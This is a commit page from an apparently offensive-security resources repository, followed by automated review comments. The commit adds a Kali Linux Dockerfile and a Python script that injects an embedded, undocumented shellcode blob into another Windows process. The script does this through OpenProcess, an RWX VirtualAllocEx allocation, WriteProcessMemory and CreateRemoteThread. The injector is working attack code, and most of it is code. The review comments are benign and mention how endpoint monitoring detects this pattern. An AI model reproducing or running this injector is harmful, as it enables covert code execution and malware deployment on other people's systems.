forked from panagiks/My-Gray-Hacker-Resources
Commit
bt3
committed
Sep 5, 2015
1 parent
656e5a0
commit 2507cfc
Showing
2 changed files
with
44 additions
and
0 deletions.
@@ -0,0 +1,12 @@ | ||
FROM officialkali/kali | ||
MAINTAINER [email protected] | ||
|
||
RUN echo "deb http:https://http.kali.org/kali sana main contrib non-free" > /etc/apt/sources.list && \ | ||
echo "deb-src http:https://http.kali.org/kali sana main contrib non-free" >> /etc/apt/sources.list && \ | ||
echo "deb http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list && \ | ||
echo "deb-src http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list | ||
ENV DEBIAN_FRONTEND noninteractive | ||
RUN apt-get -y update && apt-get -y dist-upgrade && apt-get clean | ||
|
||
CMD ["/bin/bash"] | ||
|
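Review bot: `FROM officialkali/kali` names neither a tag nor a digest, so each build pulls whatever that repository serves at the time, and the later `apt-get -y dist-upgrade` moves the result further; two builds of this file are not the same image. Pinning the base, e.g. `FROM officialkali/kali:<tag>@sha256:<digest>` (placeholders), makes the image reproducible and reviewable. The four repository lines are rendered on this page as `http:https://…`, which looks like an extraction artifact; if the file itself uses plain `http://`, package integrity rests entirely on apt's signature verification, so nothing in this image should weaken it. `ENV DEBIAN_FRONTEND noninteractive` also persists into the running container; setting it inline on the `RUN apt-get` line keeps it build-only.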
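--- a/Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py
+++ b/Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py
@@ -0,0 +1,32 @@
+# import ctypes to interact witht eh Windows API
+from ctypes import *
+
+# sets the section of memory that stores shellcode as RWX
+page_rwx_value = 0x40
+
+# all possible rights
+process_all = 0x1F0FFF
+
+# allocate memory, ensure it is zeroed for writting to memory
+memcommit = 0x00001000
+
+# stores the available calls from windll.kernel32
+kernel32_variable = windll.kernel32
+
+shellcode = "\xbb\xbb\x48\x30\x8d\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x47\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb4\xaa\xc5\x71\x22\xa8\x26\x8a\xb2\xcd\xaf\x6f\x83\xcd\xd4\xe4\xb3\xfd\x9f\xa9\x3f\x75\xcd\x59\xb4\xfb\xda\x6e\x7d\xb1\x3c\x40\x7e\xea\x7d\xc3\xfc\xf1\x51\x23\x3d\x3a\xa4\x22\x7a\x27\x45\x76\xd3\x23\xf8\x67\x50\x79\xc1\x0c\x2a\x6f\x41\xf0\xfa\x8e\x60\xa7\x71\xc9\xa2\x49\x56\x61\xeb\x51\xbb\x4c\xa5\xea\x0f\x3a\x34\x3b\x5e\xc3\x9b\x02\x6f\x36\xe5\x43\x57\xa9\x90\xbd\xa4\x54\xa3\x79\xd7\x82\x26\x9a\x7f\x40\x90\x46\x7e\x85\x47\x0c\x8c\x62\x03\x4a\x90\x75\xc0\xe0\xac\xfe\xe7\x26\x25\x44\xcc\xe2\x6e\x1e\x6d\xb2\xca\xf1\x92\xa4\xb5\xae\x36\xae\x5b\xba\x4a\xed\x33\x0f\x67\x0e\xc3\x07\xf0\x7d\xf1\x88\xaa\xe9\xb9\x41\x75\xed\xbe\x7b\xc1\x61\x41\x84\x32\xab\x85\xd0\x62\xc3\x2c\x59\xe9\x13\xd1\x8c\xbe\x43\x7d\x7f\x7f\x34\x3d\x2f\x17\x5e\xb2\x10\x07\x61\x19\x39\xa2\x9b\xc9\x86\x9b\x9b\x96\x6f\xde\xe3\x89\x8c\x57\x05\xa3\x42\x3e\x9d\x5b\xfa\x1b\x55\xfa\x03\xb6\x13\x3c\x8f\x35\xe3\xf2\x78\x33\xf7\x62\x89\x0e\xa5\x24\x96\xa4\xc0\xc8\x02\x43\x43\x9f\xba\x49\xb2\xd7\x64\xb1\x91\x6c\xac\x27\x5a\x1a\xd1\xa7\x5a\xda\x87\xad\x5a\xb2\x7f\x96\x08\xa7\x7f\x03\x3d\x74\xea\xac\x14\x29\xbd\xc4\x9a\x14\x89\x4a\x64\x73\x0b\xb6\xb3\xbd\x79\xd6\x07"
+
+# process ID that the shellcode will be injected into
+process_id = 1234
+shellcode_length = len(shellcode)
+
+# makes a call to OpenProcess
+process_handle = kernel32_variable.OpenProcess(process_all, False, process_id)
+
+# calls VirtualAllocEx, function that allocates memory in remote process
+memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
+
+# writes shellcode to the are of memory within the process
+kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
+
+# creates thread within the another process
+kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)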
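Review bot: The `shellcode` literal is an opaque byte string with no comment saying what it does or how it was produced, so anyone who runs this sample executes bytes they cannot review; a comment above it such as `# payload: <what it does>, generated with <tool and options>` (placeholders) would document it. Several comments carry typos that blur their meaning and should be corrected: `witht eh`, `writting`, `the are of memory`, `within the another process`. For readers studying this from the detection side, a header comment could record that the sequence in this file — OpenProcess with all-access rights, a remote allocation with protection 0x40 (execute/read/write), WriteProcessMemory, then CreateRemoteThread — is what endpoint monitoring keys on, for example Sysmon Event ID 8 for the remote thread. On style, `from ctypes import *` pulls every ctypes name into the module; `import ctypes` with qualified names makes it clear which calls touch the Windows API.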